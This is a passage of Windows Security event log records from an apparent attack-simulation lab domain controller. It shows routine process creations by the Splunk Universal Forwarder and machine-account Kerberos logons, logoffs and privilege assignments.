Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1a94
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263555
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x106c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263554
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xa80
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263557
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Delegation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x7231FE
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {91CA8262-9E50-FD4E-69C1-B65F14ACC796}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59827
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:11:20 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263556
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7231FE
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:11:31 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263558
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x7231FE
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263561
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x723FD7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263560
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x723FD7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59836
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:11:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263559
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x723FD7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263562
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1288
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263564
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1704
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:09 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263563
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x19d8
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:10 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263565
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1564
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:13 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263566
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1804
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263568
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x155c
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:14 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263567
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x9bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xb20
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263574
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726EE7
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263573
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x726EE7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59843
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263572
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726EE7
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263571
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726E7B
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263570
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x726E7B
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: fe80::4c41:d752:3570:2ca6
Source Port: 59842
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:17 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263569
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x726E7B
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=263577
Keywords=Audit Success
Message=An account was logged off.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x727CAA
Logon Type: 3
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer.
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=263576
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Logon Information:
Logon Type: 3
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE.LOCAL
Logon ID: 0x727CAA
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {D86F149B-DAEC-EE97-650F-2B5A9BD5B8D7}
Process Information:
Process ID: 0x0
Process Name: -
Network Information:
Workstation Name: -
Source Network Address: ::1
Source Port: 59851
Detailed Authentication Information:
Logon Process: Kerberos
Authentication Package: Kerberos
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 02:12:54 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=263575
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x727CAA
Privileges: SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
04/19/2021 02:13:08 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-209.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=263578
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-209$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
